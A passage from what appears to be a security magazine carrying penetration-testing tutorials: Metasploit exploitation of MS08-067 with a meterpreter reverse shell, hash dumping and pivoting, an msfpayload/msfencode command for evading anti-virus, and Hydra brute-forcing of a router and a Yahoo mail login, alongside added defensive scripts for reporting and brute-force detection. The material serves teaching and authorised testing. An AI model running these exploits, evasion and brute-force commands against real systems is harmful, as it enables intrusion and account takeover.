Lets take a look at the open services on just one of these hosts, for example, we will use 192.168.1.197
(Figure 21).
services 192.168.1.197
Figure 21. Services_ip
Notice that port 445 was open on this host. Additionally it was open on 3 other hosts, so we can use one of Metasploit's many auxiliary modules to perform some more scanning and enumeration. The show options command will list all module options for the currently loaded module (and payload); in order for a module to run successfully you must complete all required fields marked "yes". In this example the only required field that is not pre-populated is RHOSTS. To set the field's value you would usually use the command set RHOSTS <IP Address>, but we will use the shortcut services -p 445 with the -R switch to add all hosts with port 445 open to RHOSTS (Figure 22).
use auxiliary/scanner/smb/smb_enumshares
show options
services -p 445 -R
Figure 22. RHOSTS
As you can see we were able to enumerate the shares on my Myth TV back-end server (Figure 23).
Figure 23. Shares
Earlier you may have noticed that the host 192.168.1.197 was being reported both as a Windows 2000 and an XP box, and we also saw that it had port 445 open. So let's see if it hasn't been patched and is susceptible to the MS08-067 vulnerability by actually trying to exploit it! As we mentioned before, Metasploit has a lot to it, so we need to know the name of the module we will use or somehow find it. Remember, if you are unsure of how to use a command you can usually add -h to the end of it, for example search -h: Figure 24.
Figure 24. Search -h
Ok, now that we see how to use the search function, let's try finding the MS08-067 module:
search ms08
You should have been returned a list that looks something like this, with the module that we were looking for
listed (Figure 25).
Figure 25. Module listed
Once we have identified the proper module we want to use we can tell Metasploit to use it, and go ahead and
take a look at the options after it loads.
use exploit/windows/smb/ms08_067_netapi
show options
Let me take a minute here and explain the difference between an exploit like this MS08 one and the auxiliary module we loaded and used earlier. Once you have all your required fields set you will execute an auxiliary module with the run command; an exploit uses the command exploit. But this isn't the only difference: the main difference between an exploit and an auxiliary module is that an exploit needs a payload in order to do anything, and there were, what, like 300 payloads available? Each exploit is matched to the payloads it will work with; not all payloads will work with all exploits. So you will have to identify which payload you want to use that will work with the particular exploit you are going to use. Once you have loaded an exploit module you can see which payloads are available to that module with the show payloads command. Now let's continue...
show payloads
set PAYLOAD windows/meterpreter/reverse_tcp
show options
Ah, now you can see that not only are there required fields for the MS08 module, but that there are also
required fields for the Payload (Figure 26).
Figure 26. Payload
We will keep going and set all these values, but first I want to point out that while LPORT is pre-populated to listen on port 4444, I usually change this to something that I know will pass, as a lot of companies have network devices which will only allow certain ports to pass from subnet to subnet, and port 443 is usually a pretty safe bet. Now we can set our values for RHOST (the remote or target IP address), LHOST (our machine's IP address), and LPORT (the port our machine will listen on for connections). Earlier I had you set your virtual machine to Bridged mode; if we hadn't done that we would have the target host trying to connect to our Windows machine first, and then we would have to forward that connection on to our BackTrack VM! (Figure 27)
set RHOST 192.168.1.197
set LHOST 192.168.1.115
set LPORT 443
show options
Figure 27. Payload options
When you have all of your fields set correctly issue the command exploit and if the host is vulnerable you
will be greeted with the meterpreter > prompt (Figure 28).
Figure 28. Meterpreter
From here you can do many different things, such as launch post exploitation modules, upload and download
files, take screenshots, dump hashes, etc. After all, you now own that box.
There are a handful of commands I usually run when I first receive a meterpreter shell, these are sysinfo,
hashdump, route, and shell. It is important to look at the routing info on any machine you exploit as it may be a
dual-homed machine and if it is, you can use Metasploit to pivot through this newly exploited machine to a whole
new subnet (Figure 29)!
Figure 29. Meterpreter commands
If you want to keep your meterpreter session alive but continue to try to exploit other hosts, use the [Ctrl+Z] key combination and Metasploit will ask you if you want to background that session. To see what active sessions you have you can always simply type sessions at the Metasploit prompt and you will be shown which sessions are active. To reconnect to a session use the command sessions -i 1. Again, you can always use the -h switch with Metasploit commands (Figure 30).
Figure 30. Sessions
Brute-forcing
Brute-forcing is a technique that repeatedly tries different combinations of usernames and passwords to log into a service or to break an encrypted password. There are two basic types of attack: dictionary and rainbow tables.
Dictionary attacks can be made using dictionary files or lists of passwords, but brute-force attacks also run through all combinations of character sets, say 0-9, A-Z, a-z and special characters. If you know the length and password policy that a company uses it will greatly cut down on the time it takes to crack a password.
For dictionary files, I would suggest searching the Internet. A good starting point would be Skull Security at
http://www.skullsecurity.org/wiki/index.php/Passwords.
Rainbow table attacks are based on huge files in which different character sets have already been hashed using all combinations of the set, and will usually crack a password long before a pure brute-force attempt using a dictionary or non-precomputed hashes. If you're interested in rainbow tables, I strongly recommend checking out Free Rainbow Tables, where you can download tables which have already been created with many different character sets. You can find them at https://www.freerainbowtables.com/.
One final note on passwords you may crack or find: users often reuse passwords. Once I find a password I always add it to my dictionary file. That way, as you continue your test, you can use those passwords against other hosts and services.
Network Infrastructure
Another item an internal penetration test should cover is the network infrastructure. There are many different ways to go about testing the infrastructure, including modules inside Metasploit. All it takes is one older or misconfigured Cisco device on the network and you can literally have access to every Cisco device on the network. From there you can do things like turn ports on and off, add your host to a restricted list, and change and monitor SPAN ports.
Cisc0wn
Daniel Compton over at Common exploits has created a nice script called Cisc0wn that will make your life
easier. He describes Cisc0wn this way:
Cisc0wn is simply a bash script that pulls various tools and enumeration into one simple command for
ease, so is not really a tool in itself. It doesn't do anything extra that you can't really already do, it just
saves running several different tools and commands and entering the same info over and over. It uses
Metasploit modules and snmpwalk for most of the tasks.
Cisc0wn can be found at http://www.commonexploits.com/?p=503 along with a nice walk-through of how to
use it. I strongly suggest you check it out when you have the time.
VoIP Networks
Many corporations now run VoIP for their phone networks. If it's in scope, or you come across a subnet that
has a lot of VoIP devices, don't forget to include these in your tests. Among other things, an attacker may be
able to break into a user's voicemail and listen to messages, or perform a man-in-the-middle attack and
actively record users' phone calls.
SIPVicious
SIPVicious is simply defined as "... a set of tools that can be used to audit SIP based VoIP systems. It
currently consists of four tools." And it's basically that, a tool for auditing SIP based VoIP systems, and can
be found at http://code.google.com/p/sipvicious/. If you have never heard of SIPVicious and are unfamiliar
with it, I would also recommend checking out http://blog.sipvicious.org/.
Databases
Databases can be a particularly interesting subject and could very well be an entirely separate article.
Companies store all sorts of information in databases. In some cases everything is fair game, but I have had
certain tests where the company stores personally identifiable information, or PII, and has said go ahead
and try to exploit the databases, BUT they wanted me to stop at the table level and not actually look at the
contents. This is very important: STOP where the client tells you to. Remember your scoping document; you are only
allowed to test what they want you to, and only as deep as they would like.
BackTrack has quite a few tools built in for databases; you can access these by going to Applications>
BackTrack> Vulnerability Assessment> Database Assessment.
Metasploit also has a lot of functionality built around databases; I suggest you start by looking at the auxiliary
modules first:
auxiliary/scanner/mssql/mssql_hashdump
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mssql/mssql_ping
auxiliary/scanner/mssql/mssql_schemadump
auxiliary/scanner/oracle/oracle_hashdump
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/oracle/sid_brute
auxiliary/scanner/oracle/sid_enum
auxiliary/scanner/http/blind_sql_query
auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_version
Camera systems: https://community.rapid7.com/community/metasploit/blog/2012/01/23/video-conferencing-and-self-selecting-targets.
Protocol Analysis
At some point you may find yourself needing to look at what's going on on the network, or need to do some
packet analysis. We're not going to talk about that here, but it is something to be aware of.
Wireshark
Wireshark is the world's foremost network protocol analyzer. It lets you see what's happening on your
network at a microscopic level. It is the de facto (and often de jure) standard across many industries and
educational institutions, and can be found at www.wireshark.org. Again, this is something else for you to
play with. Fire it up on your test or home network, and I think you'll be surprised at what you see.
Default Passwords
Default installs and configurations are often left with the default username and password. If you come across
a login page to, say, a router, web application, camera system, etc., it's always worth Googling for the specific
device or software (and sometimes version) + "default password", as you will be surprised how often
someone sets up a device or installs some new software, configures it, then just leaves the default login.
Additionally, if you are having a hard time finding the default, go ahead and look for the setup or installation
guide, since it will tell you whether or not there is a default password. Manufacturers are becoming
more security aware and increasingly ship without defaults, instead requiring the user to input their own
password during initial setup.
Evading Anti-virus
Undoubtedly you will find some machine that you should be able to exploit, but try as you may, you just can't
get it to work! Most likely the culprit will be some type of anti-virus. There are things you can do to get around
AV but, again, that's well beyond the scope of this article. With that said, a safe place to start is the Metasploit
Framework, which includes the tools msfpayload and msfencode that allow you to encode your payload with
quite a few different options. You may have to try again and again with different options before your payload
actually bypasses the AV. The basic format of the command will look like this:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.115 R | ./msfencode -t exe -x calc.exe -k -o exploit.exe -e x86/shikata_ga_nai -c 5
Reporting
Remember we said earlier that the whole point of penetration testing is not only to find the holes before an
attacker would, but also to deliver a report to your client with actionable items. I create all of my reports by hand.
What I do is show the workflow that I followed during the test and include pictures where needed.
Remember that this report may go through quite a few hands, and you may want to show step by step how
you exploited a specific device, since there may be a technical person who would want to recreate the steps,
or test them again after the vulnerability has been remediated. Another thing I show is the number of overall
vulnerabilities that I was able to identify during a test. If you have a client who performs yearly testing, they
may use these numbers as metrics at some point to show that, for example, last year they had 500 critical and
high severity issues, but this year they only have 75.
I always make recommendations based on my test. For instance, I may see that a client is still using Telnet
or FTP, which pass everything (including user credentials) unencrypted and in the clear, and if someone is
sniffing the traffic (remember Wireshark?) they can easily harvest the credentials of any user logging into
those systems.
Since I use Nessus and Core Impact, one final thing I include is my scan data in the form of a report.
There may be some system on the network with a vulnerability that I did not get around to exploiting,
or there may be no publicly available exploits. This doesn't mean that there won't be some released in
the future, and I always recommend that these issues be remediated. The great part about a lot of these
reports is that they include links to the original vulnerability along with the fix, and that translates to fewer
questions that I have to answer or follow up on!
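As an added example of the metrics described above (this is not code from the article, and it is not tied to the actual export formats of Nessus or Core Impact), the following Python script takes a simplified CSV export of findings, with assumed columns Host, Risk, Name and Solution, totals them by severity, compares them with a constructed baseline standing in for last year's numbers, and groups findings by issue so that one recommendation, such as retiring Telnet and FTP, covers every affected host. The CSV rows and the baseline are constructed for this example.

```python
import csv
import io
from collections import Counter, defaultdict

SEVERITIES = ["Critical", "High", "Medium", "Low"]

# Constructed extract in the shape of a scanner CSV export. The column names
# Host, Risk, Name and Solution are an assumption for this example, not any
# particular product's export format.
THIS_YEAR_CSV = """Host,Risk,Name,Solution
10.0.0.5,Critical,Unpatched MS-SQL Server build,Apply the vendor service pack
10.0.0.5,High,Telnet service enabled,Disable Telnet and use SSH
10.0.0.7,High,FTP server allows cleartext authentication,Use SFTP or FTPS
10.0.0.7,Medium,SNMP default community string,Change the community string
10.0.0.9,Low,ICMP timestamp request enabled,Filter ICMP timestamp requests
10.0.0.9,High,Telnet service enabled,Disable Telnet and use SSH
"""

# Constructed baseline standing in for the totals of a previous year's report.
LAST_YEAR = {"Critical": 3, "High": 6, "Medium": 4, "Low": 2}


def load_findings(csv_text):
    """Parse the export into a list of dicts, one per finding."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def count_by_severity(findings):
    """Totals per severity, in the order the report lists them."""
    counts = Counter(f["Risk"] for f in findings)
    return {s: counts.get(s, 0) for s in SEVERITIES}


def year_over_year(current, previous):
    """Change per severity versus the previous report (negative is an improvement)."""
    return {s: current.get(s, 0) - previous.get(s, 0) for s in SEVERITIES}


def remediation_table(findings):
    """Group findings by issue so one recommendation covers every affected host."""
    table = defaultdict(lambda: {"risk": None, "hosts": [], "solution": None})
    for f in findings:
        row = table[f["Name"]]
        row["risk"] = f["Risk"]
        row["solution"] = f["Solution"]
        row["hosts"].append(f["Host"])
    return dict(table)


def cleartext_protocol_hosts(findings):
    """Hosts still offering Telnet or FTP, the recommendation singled out above."""
    return sorted({f["Host"] for f in findings if f["Name"].startswith(("Telnet", "FTP"))})


if __name__ == "__main__":
    findings = load_findings(THIS_YEAR_CSV)
    totals = count_by_severity(findings)
    print("Totals:", totals)
    print("Change vs last year:", year_over_year(totals, LAST_YEAR))
    for issue, row in remediation_table(findings).items():
        print("%-8s %s -> %s (%s)" % (row["risk"], issue, row["solution"], ", ".join(row["hosts"])))
    print("Still running Telnet/FTP:", cleartext_protocol_hosts(findings))
```

Keeping the grouping by issue rather than by host is what makes the numbers comparable from year to year: a Telnet finding on three hosts is one remediation item, and the severity totals are what the client will quote back as a metric.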
Conclusion
Hopefully you have found this article informative and now have a better idea of where to start when
performing penetration tests. Since this was an article for a magazine, with a limited amount of space,
there may have been some things that I couldn't cover in as much depth as I would have liked.
But Google is your friend, and the information is out there. One thing that I touched on, but did not go into
detail on, is the testing of web applications. That subject alone would have more than tripled the size of this
article. If you are interested in the penetration testing of web applications, I would suggest taking a look at
w3af and Burp Suite, which can be found at http://w3af.org/ and http://portswigger.net/burp/.
One final note: you will want to be aware of compliance. Many of your clients will be having a penetration
test done in order to be in compliance with requirements such as PCI-DSS, for an audit, or to meet some
other regulatory or industry standard. If you are engaged for such a test, make sure you know that your
methodology and test plan will meet their compliance needs, as many of them require particular items be
tested in a specific way.
About the Author
Nick Hensley, having held his CISSP since 2002, is a seasoned Information Security Professional with
12 years of industry experience. He currently manages a team of penetration testers, and performs
penetration and application security testing alongside his team, supporting roughly 150 different clients.
His background covers a broad range of managerial and technical positions. Nick's expertise lies in
Penetration Testing, Computer Forensics, Electronic Discovery, Intrusion Detection and Prevention
Systems, and Security Architecture Design and Implementation. He can be reached via email at
NickHensleyCISSP@gmail.com.
Using Hydra To Crack The Door Open
by Nikolaos Mitropoulos
Take advantage of a cracking tool to test the resilience of your local or remote network
servers and various other devices from a computer to a router on the network.
Security ranges in complexity from basic computing systems to more intricate industrial systems with
biometric locks, or weapons like quantum computing that will come into play in the future.
The more important the data is, the tighter the locks must be. The security countermeasures can range from simple
to more elaborate as we climb the ladder of importance of the information to be protected. A chain is only as
strong as its weakest link.
Figure 1. Base memory size used in VirtualBox installation
If the password of the administrators is not secure enough, then the attacker may use privilege escalation to get to
the data, thwarting any attempt to keep it from the myriads of attackers who seek to gain direct access to it.
If we keep the front door heavily fortified, then malicious persons will go to the next available building
to try their luck. Hence, the password strength of your local network access, network devices or even remote
servers and other devices is a critical step in preventing attacks. Below are some of the rules for achieving
strong passwords. Basic password creation rules:
A minimum password length of 12 to 18 characters.
Include numbers, upper and lower case combinations as well as symbols, if the system allows it.
Avoid names or important personal information that someone else also knows, e.g. your father's name or
your date of birth.
Use a password generator (where feasible).
Store them in special applications with a master password set, and not on post-it notes or handwritten
notes hidden at your desk.
Change any default passwords.
Make intentional typos that only you know.
Do not use the same password for all your systems.
Change your password frequently.
So, now you know the rules. But how do you ensure that your passwords are strong enough and not too
complicated to remember? How can you evaluate the strength of your password? You can use tools in
Backtrack to test your password resilience.
Figure 2. Hard disk size used in VirtualBox installation
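The brute-forcing overview in the previous article and the password rules above come down to the same question: how much work does a password leave to an attacker? The following Python script is an added example, not code from the article or from Backtrack, that applies the rules listed above to a password and computes the size of the search space a given policy (length range and character classes) leaves for a brute-force attempt. The character classes, the weak-word list, the sample passwords and the guess rate are all constructed for this example.

```python
import string

# Character classes a policy typically counts; constructed for this example.
CLASSES = {
    "lower": set(string.ascii_lowercase),
    "upper": set(string.ascii_uppercase),
    "digit": set(string.digits),
    "symbol": set(string.punctuation),
}

# A few well-known weak choices, including the ones the article cites from the
# film Hackers; a constructed list, not a real default-password database.
WEAK_WORDS = {"password", "admin", "love", "secret", "sex", "god", "backtrack"}


def classes_used(password):
    """Return the names of the character classes that appear in the password."""
    return {name for name, chars in CLASSES.items() if any(c in chars for c in password)}


def check_password(password, personal=(), min_length=12):
    """Apply the article's rules; return the list of failed rules (empty means it passes).

    `personal` is an iterable of strings someone else could know (names, birth years).
    """
    failures = []
    if len(password) < min_length:
        failures.append("shorter than %d characters" % min_length)
    if len(classes_used(password)) < 3:
        failures.append("fewer than three character classes")
    lowered = password.lower()
    if lowered in WEAK_WORDS:
        failures.append("common or default password")
    for item in personal:
        if len(item) >= 4 and item.lower() in lowered:
            failures.append("contains personal information (%s)" % item)
            break
    return failures


def keyspace(length, classes):
    """Number of candidates of exactly `length` characters drawn from `classes`."""
    alphabet = sum(len(CLASSES[name]) for name in classes)
    return alphabet ** length


def keyspace_range(min_length, max_length, classes):
    """Candidates an attacker must try when only the policy's length range and classes are known."""
    return sum(keyspace(n, classes) for n in range(min_length, max_length + 1))


def worst_case_seconds(min_length, max_length, classes, guesses_per_second):
    """Time to exhaust the whole search space at a given (constructed) guess rate."""
    return keyspace_range(min_length, max_length, classes) / guesses_per_second


if __name__ == "__main__":
    for pw in ["love", "nikolaos1990", "Tr0ub4dor&3!Xy"]:
        print(pw, check_password(pw, personal=["Nikolaos", "1990"]) or "passes all rules")
    # Knowing the policy changes the search enormously: 8 digits only versus
    # exactly 12 characters from all four classes, at an assumed 10^9 guesses/s.
    print(worst_case_seconds(8, 8, {"digit"}, 1e9), "seconds vs",
          worst_case_seconds(12, 12, set(CLASSES), 1e9), "seconds")
```

The rule check is deliberately conservative (a name embedded inside a longer password still fails), and the keyspace figures are the worst case for a pure brute-force attempt; a dictionary or rainbow-table attack against a common word finishes far sooner, which is why the weak-word rule is checked separately from length and class mix.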
Installing Backtrack on VirtualBox
There are three ways to operate Backtrack:
Install it on your computer.
Run it from a live CD.
Install it in a virtual environment such as VirtualBox or VMware.
I am going to demonstrate how to work with a Backtrack installation in VirtualBox. In order to achieve this,
you have to download two components:
the latest VirtualBox version (can be found at https://www.virtualbox.org/wiki/Downloads)
the Backtrack image to use for VirtualBox (can be found at http://www.backtrack-linux.org/downloads/)
Once you have both of the above, you can begin the installation in VirtualBox. Keep two things in mind.
Allow larger memory space and hard disk to be allocated during installation, as you see in the two
screenshots above (Figures 1 and 2). I use at least 1024 MB of memory and a hard disk larger than 10 GB in
size. All other settings you can leave at their defaults. Attach the Backtrack .iso to this VirtualBox instance
and run it to complete the installation process. One last thing: be patient during the final installation, as you may
see the progress bar slow at 99%. Do not abort, and you will eventually see the message shown in Figure 3.
Figure 3. Installation completion message from Backtrack
The password tools in Backtrack are located in the following menu path: Backtrack > Privilege Escalation >
Password Attacks, as you can also see in Figure 4.
Figure 4. Backtrack password cracking tools
In our next example we will use nmap, also included in Backtrack, which is an open source tool for network
discovery and security auditing. Since this article's intent is not to demonstrate nmap usage, I will only tell
you that one of its most famous features is port scanning. So, if you have a computer, a router or
any other device on the network, you can use its IP address with nmap to see which ports are open on it. I
have my router on the local network with the IP 192.168.1.1, and I want to run a port scan on it to see what the
open services are, so I use the command: nmap 192.168.1.1. As you can see in Figure 5, my device has
TCP ports 21, 23, 53, 80 and 5555 open. Nmap, in this mode, has scanned a total of 1,000 ports.
Figure 5. Using nmap to perform port scanning at 192.168.1.1 (routers IP)
I will move on to introducing Hydra, which is a well-known tool for dictionary attacks on various devices
(you can find it in the Online Attacks sub-path of the Backtrack menu structure mentioned above). Alternatively, if you
are using Windows, you can try to download Cygwin and run the tools from there. In this example, I will use
Hydra to target my router in order to perform a dictionary attack on the password. I will use a dictionary.txt
file which I will populate and grow as time goes by. I have trimmed it for this
demonstration to 30 passwords. The parameters that Hydra accepts are shown in Listing 1.
Listing 1. Hydra parameters of operation
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS]
[-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server
service [OPT]]|[service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type -x -h to get help
-e nsr try n null password, s login as pass and/or r reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated login:pass format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V verbose mode / show login+pass combination for each attempt
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: cisco cisco-enable
cvs firebird ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy
http-proxy-urlenum icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql
ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp
rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh svn teamspeak
telnet vmauthd vnc xmpp
The command string to be used to attack the router, along with its arguments, is as follows:
hydra -V -l admin -P /root/Desktop/dictionary.txt -t 36 -f -s 80 192.168.1.1 http-get /
So we are essentially telling Hydra to show each username and password combination as it is tried (-V), to use
the username admin (-l; as in most router cases, but if we want, another dictionary can be used here for usernames),
which password file to use (-P), the number of parallel connections or tasks (-t), to exit after the first
successful crack (-f), that the port is 80 (-s; the HTTP port, which is open as nmap showed earlier), that the
IP address of the router is 192.168.1.1, and that the protocol is http-get (usually it is either get or post).
Notice the character / at the end of the line, which specifies that the attempt is made against the root page (it is like
saying try the login credentials at index.html). The output we get is shown in Figure 6.
Figure 6. The output of the attempt to crack the password of the router at 192.168.1.1
From what you can see, the password search wasn't successful, so the program just concludes its
execution. As already stated earlier, keep one basic principle in mind: the better the variety and size of the
original dictionary, the better the result will be. Let us try a different approach this time by attacking the
router's FTP service, using the command string that follows. This time, we tell Hydra to also try a null password and
the login name as the password (-e ns), in addition to what we did earlier.
hydra -V -l admin -P /root/Desktop/dictionary.txt -e ns -f -s 21 192.168.1.1 ftp
If you are not a command line addict, you can use the GUI version of Hydra. For instance, checking the
parameters shown in Figure 7 and Figure 8 gives the same settings as the above command line.
Figure 7. Hydra settings in target tab
Figure 8. Hydra settings in passwords tab
If you want to change the number of tasks you can use the Tuning tab, and as soon as you have set everything, go
to the Start tab and start the application. After that, you can save your output for future inspection.
For example, I have the output below from my test, where the two additional lines at the end state:
[ATTEMPT] target 192.168.1.1 login admin pass enti4752
[21] [ftp] host: 192.168.1.1 login: admin password: enti4752
So to verify that this is indeed true, I will ftp to 192.168.1.1 using admin as the username and enti4752 as the password.
Figure 9. Connecting through ftp to 192.168.1.1
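From the defender's side, the HTTP and FTP attacks just described are easy to spot in server logs: with -t 36, Hydra produces dozens of failed logins per second from one source. The Python script below is an added example (it is not part of the article) that scans Apache-style access-log lines for 401 responses and vsftpd-style FAIL LOGIN lines, and flags any source IP with at least ten failures inside a sliding 60-second window. The sample log lines, the two regular expressions and the thresholds are constructed for this example; check the patterns against your own log format before relying on them.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" access-log line; the regex is constructed for this example.
HTTP_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)
HTTP_TS = "%d/%b/%Y:%H:%M:%S %z"

# vsftpd-style log line for a failed login; also a constructed regex.
FTP_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]*)\] '
    r'FAIL LOGIN: Client "(?P<ip>[^"]+)"'
)
FTP_TS = "%a %b %d %H:%M:%S %Y"


def failed_http_auth(line):
    """Return (ip, timestamp) for a 401 response, else None."""
    m = HTTP_RE.match(line)
    if not m or m.group("status") != "401":
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), HTTP_TS)


def failed_ftp_login(line):
    """Return (ip, timestamp) for a vsftpd FAIL LOGIN line, else None."""
    m = FTP_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), FTP_TS)


def find_bruteforce(lines, parser, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: time_first_flagged} for sources with >= threshold failures inside `window`.

    Keeps a sliding window of failure times per source IP; events are sorted by
    time first, so the order of lines in the input does not matter.
    """
    events = sorted((e for e in map(parser, lines) if e is not None), key=lambda e: e[1])
    recent = defaultdict(deque)
    flagged = {}
    for ip, ts in events:
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


# Constructed samples: twelve 401s in twelve seconds from one source next to
# normal traffic, and ten FTP login failures every four seconds from the same source.
HTTP_SAMPLE = [
    '192.168.1.50 - - [10/Oct/2013:12:00:%02d +0000] "GET / HTTP/1.0" 401 381 "-" "Mozilla/4.0 (Hydra)"' % s
    for s in range(12)
] + [
    '192.168.1.20 - - [10/Oct/2013:12:00:05 +0000] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '192.168.1.20 - - [10/Oct/2013:12:00:06 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"',
]
FTP_SAMPLE = [
    'Thu Oct 10 12:01:%02d 2013 [pid 2311] [admin] FAIL LOGIN: Client "192.168.1.50"' % s
    for s in range(0, 40, 4)
] + ['Thu Oct 10 12:01:40 2013 [pid 2312] [admin] OK LOGIN: Client "192.168.1.20"']

if __name__ == "__main__":
    print("HTTP:", find_bruteforce(HTTP_SAMPLE, failed_http_auth))
    print("FTP: ", find_bruteforce(FTP_SAMPLE, failed_ftp_login))
```

The detection keys on failure counts per source rather than on the client string (the constructed sample carries a Hydra-like User-Agent, but that is trivially changed), and the threshold and window are the two knobs to tune: a single user mistyping a password a few times should stay well under ten failures a minute, while a dictionary run at -t 36 exceeds it within the first second.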
Let's see one more example of using Hydra, but this time to crack Yahoo mail accounts (the same logic applies to
Gmail, Hotmail or any other mail server). We use the following settings:
Simple target: smtp.mail.yahoo.com (Yahoo server)
Protocol: smtp
Port: 465
Enable also: SSL, verbose and show attempts.
The login name that we specify is the mail account that we are attempting to crack, so in my example I
put my own account, and I also specified a dictionary for the attack, which is the same one that I have been using
throughout this presentation (Figure 10 and Figure 11).
Figure 10. Hydra Target tab settings for cracking yahoo passwords
Figure 11. Hydra Passwords tab settings for cracking yahoo passwords
If we now choose to start Hydra, you will notice output like the one in Figure 12. I have shortened the
dictionary to limit the execution time, as well as to shorten the output in order to focus on the result.
Figure 12. Attacking yahoo mail account and revealing the password
While an additional line at the end will state:
[25] [smtp] host: 188.125.69.59 login: zeroout2003@yahoo.gr password: backtrack
If I use the above credentials I will be able to successfully login to my mail account using the standard web
page at https://login.yahoo.com/.
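Hydra prints one line per valid credential in the format shown above and in the earlier FTP example. As an added example, not part of the article, the Python script below parses that output into records for a findings table, counts the [ATTEMPT] lines so the report can state how many guesses were made, and masks each password so the report proves the finding without printing the secret. The regular expressions, the sample output and its credentials are all constructed.

```python
import re

# One "found" line per credential, in the form shown in the article's output,
# e.g. "[21][ftp] host: 192.168.1.1 login: admin password: enti4752".
# The regex is constructed here; it tolerates a space between the two brackets.
FOUND_RE = re.compile(
    r'^\[(?P<port>\d+)\]\s*\[(?P<service>[\w-]+)\]\s+host:\s+(?P<host>\S+)'
    r'\s+login:\s+(?P<login>\S+)\s+password:\s+(?P<password>.*)$'
)
ATTEMPT_RE = re.compile(r'^\[ATTEMPT\]')


def parse_hydra_output(text):
    """Return (attempts, found): the number of [ATTEMPT] lines and a list of credential dicts."""
    attempts = 0
    found = []
    for line in text.splitlines():
        line = line.strip()
        if ATTEMPT_RE.match(line):
            attempts += 1
            continue
        m = FOUND_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["port"] = int(rec["port"])
            found.append(rec)
    return attempts, found


def mask(secret, keep=2):
    """Keep only the first `keep` characters so the report shows the find, not the password."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)


def report_rows(found):
    """Rows for the findings table: host, service/port, login, masked password."""
    return [
        (rec["host"], "%s/%d" % (rec["service"], rec["port"]), rec["login"], mask(rec["password"]))
        for rec in found
    ]


# Constructed sample output; the hosts and credentials are invented for this example.
SAMPLE_OUTPUT = """\
[ATTEMPT] target 192.168.1.1 login admin pass 12345
[ATTEMPT] target 192.168.1.1 login admin pass s3cret
[21][ftp] host: 192.168.1.1   login: admin   password: s3cret
[ATTEMPT] target 10.0.0.8 login alice@example.org pass Winter2013
[25] [smtp] host: 10.0.0.8   login: alice@example.org   password: Winter2013
1 of 1 target successfully completed, 1 valid password found
"""

if __name__ == "__main__":
    attempts, found = parse_hydra_output(SAMPLE_OUTPUT)
    print("%d attempts, %d valid credentials" % (attempts, len(found)))
    for row in report_rows(found):
        print("%-14s %-10s %-20s %s" % row)
```

Because the regex allows trailing text after "password:", a password containing spaces is captured whole; the masked form is what goes into the client report, while the full record stays with the tester's working notes (and, as the first article recommends, the recovered passwords go into the dictionary file for the rest of the test).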
Summary
The above article clearly shows how easy it is to target a system. We have used nmap as a network scanner,
and the supported protocols and functions of Hydra.
As we already stated through the course of this article, when dealing with dictionary attacks, the tools are only as
strong as their dictionaries and the processing power that someone has at his disposal in order to
combine the dictionary attack with proper brute force cracking capability. There are also a lot of other tools
in Backtrack for online and offline password cracking, such as rainbowcrack, John the Ripper,
medusa, ncrack and many others that are worth dissecting in other articles.
For instance, John the Ripper has the ability to crack password hashes, so if we get the hashed contents of a
password file, the application can recover the original plain text by hashing candidate passwords and comparing
them against the stored hashes.
You will be amazed that many people still use default passwords or just simple words as passwords.
Never underestimate how simple-minded users or system administrators can be. I am sure you can remember
the old movie Hackers; the passwords referenced are: love, secret, sex and God. You wouldn't
believe how many people use these words as their passwords.
About the Author
Nikolaos Mitropoulos has been working for over a year as a network security
engineer for AT&T's Managed Security Services team. He is Cisco and Juniper
certified (holding CCNA, JNCIA and JNCIS-SEC certifications). In the past four years
he has focused on teaching at various education levels, ranging from professor of
secondary education level courses to demanding corporate classes for professionals
dealing in multiple aspects of the networking and security fields. His hobbies are
steganography, digital watermarking and building penetration testing skills.
NMAP and Metasploit for MS-SQL Auditing
by Jose Ruiz
NMAP is the best network scanner tool that you can find, period. Also, Metasploit is the
#2 security tool today according to sectools.org, so it's a must for any security professional.
